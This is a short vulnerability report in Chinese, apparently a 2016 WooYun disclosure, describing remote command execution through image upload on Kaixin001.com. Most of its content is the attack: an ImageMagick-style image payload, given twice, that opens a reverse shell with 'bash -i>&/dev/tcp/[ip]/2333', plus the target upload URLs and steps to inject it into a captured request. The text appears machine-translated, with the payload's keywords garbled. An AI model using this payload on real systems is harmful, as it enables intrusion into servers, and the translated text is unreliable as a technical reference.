漏洞标题 快乐网络多命令执行 相关制造商 Kaixin001.com 漏洞作者 千机 提交时间 2016-05-31 09: 26 公共时间 2016-06-12 14: 00 漏洞类型 命令执行 危险等级 高 自我评估等级 20 漏洞状态 该漏洞已通知供应商,但供应商忽略了该漏洞 标签标签 远程命令执行 漏洞详细信息 今天的漏洞 http://www.kaixin001.com/set/logo.php 修改头像。您可以像以前一样通过以下有效负载弹回shell 推送图形上下文 Viewbox 0 0 640 480 图像复制200,200 100,100'| bash -i>&/dev/tcp/[ip]/2333 0>& 1' 流行图形上下文 , 上传普通图片时,请捕获包并直接添加上述有效内容。 直接反弹壳
漏洞证明:
http://www.kaixin001.com/photo/upload.php http://www.kaixin001.com/lifetime/perfect.php 上传图片
使用以下有效负载 推送图形上下文 Viewbox 0 0 640 480 图像复制200,200 100,100'| bash -i>&/dev/tcp/[ip]/2333 0>& 1' 流行图形上下文 上传普通照片,然后捕获有效负载,上传弹跳外壳
所有源代码
修理计划: 改变和改变 版权声明:请注明出处。成千上万的机器@乌云